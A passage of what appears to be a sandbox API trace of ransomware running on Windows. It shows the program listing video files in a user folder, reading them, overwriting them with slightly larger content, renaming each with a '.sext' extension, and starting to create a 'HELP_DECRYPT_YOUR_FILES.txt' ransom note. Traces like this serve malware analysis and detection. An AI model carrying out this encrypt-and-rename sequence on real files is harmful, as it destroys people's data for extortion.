HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ", lpFilePart=0x0) returned 0x38 [0107.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\", nBufferLength=0x105, lpBuffer=0x12e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\", lpFilePart=0x0) returned 0x39 [0107.305] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\*", lpFindFileData=0x12e2b0 | out: lpFindFileData=0x12e2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae10c960, ftCreationTime.dwHighDateTime=0x1d5e514, ftLastAccessTime.dwLowDateTime=0x14073b80, ftLastAccessTime.dwHighDateTime=0x1d5dbcb, ftLastWriteTime.dwLowDateTime=0x14073b80, ftLastWriteTime.dwHighDateTime=0x1d5dbcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0107.305] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae10c960, ftCreationTime.dwHighDateTime=0x1d5e514, ftLastAccessTime.dwLowDateTime=0x14073b80, ftLastAccessTime.dwHighDateTime=0x1d5dbcb, ftLastWriteTime.dwLowDateTime=0x14073b80, ftLastWriteTime.dwHighDateTime=0x1d5dbcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.306] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x115bda10, ftCreationTime.dwHighDateTime=0x1d5dc59, ftLastAccessTime.dwLowDateTime=0xf493aad0, ftLastAccessTime.dwHighDateTime=0x1d5e481, ftLastWriteTime.dwLowDateTime=0xf493aad0, ftLastWriteTime.dwHighDateTime=0x1d5e481, nFileSizeHigh=0x0, nFileSizeLow=0x18d0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="-g3VNA.avi", cAlternateFileName="")) returned 1 [0107.306] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb898d80, ftCreationTime.dwHighDateTime=0x1d5e005, ftLastAccessTime.dwLowDateTime=0x45e1aef0, ftLastAccessTime.dwHighDateTime=0x1d5d7ad, ftLastWriteTime.dwLowDateTime=0x45e1aef0, ftLastWriteTime.dwHighDateTime=0x1d5d7ad, nFileSizeHigh=0x0, nFileSizeLow=0x10db, dwReserved0=0x0, dwReserved1=0x0, cFileName="9h7TCbmOvMAG.mkv", cAlternateFileName="9H7TCB~1.MKV")) returned 1 [0107.306] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc59200d0, ftCreationTime.dwHighDateTime=0x1d5dce1, ftLastAccessTime.dwLowDateTime=0x7a26efb0, ftLastAccessTime.dwHighDateTime=0x1d5de36, ftLastWriteTime.dwLowDateTime=0x7a26efb0, ftLastWriteTime.dwHighDateTime=0x1d5de36, nFileSizeHigh=0x0, nFileSizeLow=0x11f03, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qd1 hcTvl.avi", cAlternateFileName="QD1HCT~1.AVI")) returned 1 [0107.306] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12275b90, ftCreationTime.dwHighDateTime=0x1d5e78a, ftLastAccessTime.dwLowDateTime=0xe29695b0, ftLastAccessTime.dwHighDateTime=0x1d5d8fe, ftLastWriteTime.dwLowDateTime=0xe29695b0, ftLastWriteTime.dwHighDateTime=0x1d5d8fe, nFileSizeHigh=0x0, nFileSizeLow=0x2fe1, dwReserved0=0x0, dwReserved1=0x0, cFileName="UZPmC1-FYNK.mkv", cAlternateFileName="UZPMC1~1.MKV")) returned 1 [0107.307] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12275b90, ftCreationTime.dwHighDateTime=0x1d5e78a, ftLastAccessTime.dwLowDateTime=0xe29695b0, ftLastAccessTime.dwHighDateTime=0x1d5d8fe, ftLastWriteTime.dwLowDateTime=0xe29695b0, ftLastWriteTime.dwHighDateTime=0x1d5d8fe, nFileSizeHigh=0x0, nFileSizeLow=0x2fe1, dwReserved0=0x0, dwReserved1=0x0, cFileName="UZPmC1-FYNK.mkv", cAlternateFileName="UZPMC1~1.MKV")) returned 0 [0107.307] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0107.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e560) returned 1 [0107.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e520) returned 1 [0107.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi", lpFilePart=0x0) returned 0x43 [0107.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0107.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\-g3vna.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0107.308] GetFileType (hFile=0x2e4) returned 0x1 [0107.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0107.308] GetFileType (hFile=0x2e4) returned 0x1 [0107.308] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x18d0f [0107.309] ReadFile (in: hFile=0x2e4, lpBuffer=0x12383860, nNumberOfBytesToRead=0x18d0f, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x12383860*, lpNumberOfBytesRead=0x12e518*=0x18d0f, lpOverlapped=0x0) returned 1 [0107.312] CloseHandle (hObject=0x2e4) returned 1 [0108.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi", lpFilePart=0x0) returned 0x43 [0108.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0108.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\-g3vna.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0108.005] GetFileType (hFile=0x2e4) returned 0x1 [0108.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0108.005] GetFileType (hFile=0x2e4) returned 0x1 [0108.005] WriteFile (in: hFile=0x2e4, lpBuffer=0x123ffa50*, nNumberOfBytesToWrite=0x18d10, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x123ffa50*, lpNumberOfBytesWritten=0x12e578*=0x18d10, lpOverlapped=0x0) returned 1 [0108.008] CloseHandle (hObject=0x2e4) returned 1 [0108.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi", lpFilePart=0x0) returned 0x43 [0108.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi.sext", lpFilePart=0x0) returned 0x48 [0108.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0108.013] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\-g3vna.avi"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x115bda10, ftCreationTime.dwHighDateTime=0x1d5dc59, ftLastAccessTime.dwLowDateTime=0xf493aad0, ftLastAccessTime.dwHighDateTime=0x1d5e481, ftLastWriteTime.dwLowDateTime=0x8eb068c0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x18d10)) returned 1 [0108.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0108.013] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\-g3vna.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\-g3VNA.avi.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\-g3vna.avi.sext")) returned 1 [0108.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv", lpFilePart=0x0) returned 0x49 [0108.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0108.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\9h7tcbmovmag.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0108.014] GetFileType (hFile=0x2e4) returned 0x1 [0108.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0108.014] GetFileType (hFile=0x2e4) returned 0x1 [0108.014] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x10db [0108.015] ReadFile (in: hFile=0x2e4, lpBuffer=0x247e820, nNumberOfBytesToRead=0x10db, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x247e820*, lpNumberOfBytesRead=0x12e518*=0x10db, lpOverlapped=0x0) returned 1 [0108.016] CloseHandle (hObject=0x2e4) returned 1 [0109.188] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv", lpFilePart=0x0) returned 0x49 [0109.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0109.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\9h7tcbmovmag.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0109.195] GetFileType (hFile=0x2e4) returned 0x1 [0109.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0109.195] GetFileType (hFile=0x2e4) returned 0x1 [0109.195] WriteFile (in: hFile=0x2e4, lpBuffer=0x235ee38*, nNumberOfBytesToWrite=0x10e0, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x235ee38*, lpNumberOfBytesWritten=0x12e578*=0x10e0, lpOverlapped=0x0) returned 1 [0109.196] CloseHandle (hObject=0x2e4) returned 1 [0109.199] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv", lpFilePart=0x0) returned 0x49 [0109.199] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv.sext", lpFilePart=0x0) returned 0x4e [0109.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0109.199] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\9h7tcbmovmag.mkv"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb898d80, ftCreationTime.dwHighDateTime=0x1d5e005, ftLastAccessTime.dwLowDateTime=0x45e1aef0, ftLastAccessTime.dwHighDateTime=0x1d5d7ad, ftLastWriteTime.dwLowDateTime=0x8f655140, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x10e0)) returned 1 [0109.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0109.199] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\9h7tcbmovmag.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\9h7TCbmOvMAG.mkv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\9h7tcbmovmag.mkv.sext")) returned 1 [0109.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi", lpFilePart=0x0) returned 0x46 [0109.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0109.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\qd1 hctvl.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0109.200] GetFileType (hFile=0x2e4) returned 0x1 [0109.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0109.200] GetFileType (hFile=0x2e4) returned 0x1 [0109.200] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x11f03 [0109.201] ReadFile (in: hFile=0x2e4, lpBuffer=0x2360458, nNumberOfBytesToRead=0x11f03, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x2360458*, lpNumberOfBytesRead=0x12e518*=0x11f03, lpOverlapped=0x0) returned 1 [0109.202] CloseHandle (hObject=0x2e4) returned 1 [0109.277] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi", lpFilePart=0x0) returned 0x46 [0109.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0109.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\qd1 hctvl.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0109.279] GetFileType (hFile=0x2e4) returned 0x1 [0109.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0109.279] GetFileType (hFile=0x2e4) returned 0x1 [0109.279] WriteFile (in: hFile=0x2e4, lpBuffer=0x2481960*, nNumberOfBytesToWrite=0x11f10, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x2481960*, lpNumberOfBytesWritten=0x12e578*=0x11f10, lpOverlapped=0x0) returned 1 [0109.281] CloseHandle (hObject=0x2e4) returned 1 [0109.332] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi", lpFilePart=0x0) returned 0x46 [0109.332] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi.sext", lpFilePart=0x0) returned 0x4b [0109.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0109.332] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\qd1 hctvl.avi"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc59200d0, ftCreationTime.dwHighDateTime=0x1d5dce1, ftLastAccessTime.dwLowDateTime=0x7a26efb0, ftLastAccessTime.dwHighDateTime=0x1d5de36, ftLastWriteTime.dwLowDateTime=0x8f7abda0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x11f10)) returned 1 [0109.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0109.332] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\qd1 hctvl.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\Qd1 hcTvl.avi.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\qd1 hctvl.avi.sext")) returned 1 [0109.333] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv", lpFilePart=0x0) returned 0x48 [0109.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0109.333] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\uzpmc1-fynk.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0109.333] GetFileType (hFile=0x2e4) returned 0x1 [0109.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0109.333] GetFileType (hFile=0x2e4) returned 0x1 [0109.334] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x2fe1 [0109.334] ReadFile (in: hFile=0x2e4, lpBuffer=0x2493d90, nNumberOfBytesToRead=0x2fe1, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x2493d90*, lpNumberOfBytesRead=0x12e518*=0x2fe1, lpOverlapped=0x0) returned 1 [0109.335] CloseHandle (hObject=0x2e4) returned 1 [0109.485] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv", lpFilePart=0x0) returned 0x48 [0109.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0109.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\uzpmc1-fynk.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0109.486] GetFileType (hFile=0x2e4) returned 0x1 [0109.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0109.487] GetFileType (hFile=0x2e4) returned 0x1 [0109.487] WriteFile (in: hFile=0x2e4, lpBuffer=0x2390168*, nNumberOfBytesToWrite=0x2ff0, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x2390168*, lpNumberOfBytesWritten=0x12e578*=0x2ff0, lpOverlapped=0x0) returned 1 [0109.488] CloseHandle (hObject=0x2e4) returned 1 [0109.490] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv", lpFilePart=0x0) returned 0x48 [0109.490] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv.sext", lpFilePart=0x0) returned 0x4d [0109.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0109.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\uzpmc1-fynk.mkv"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12275b90, ftCreationTime.dwHighDateTime=0x1d5e78a, ftLastAccessTime.dwLowDateTime=0xe29695b0, ftLastAccessTime.dwHighDateTime=0x1d5d8fe, ftLastWriteTime.dwLowDateTime=0x8f928b60, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x2ff0)) returned 1 [0109.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0109.491] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\uzpmc1-fynk.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\UZPmC1-FYNK.mkv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\uzpmc1-fynk.mkv.sext")) returned 1 [0109.491] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\HELP_DECRYPT_YOUR_FILES.txt", nBufferLength=0x105, lpBuffer=0x12dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\HELP_DECRYPT_YOUR_FILES.txt", lpFilePart=0x0) returned 0x54 [0109.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e490) returned 1 [0109.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\HELP_DECRYPT_YOUR_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 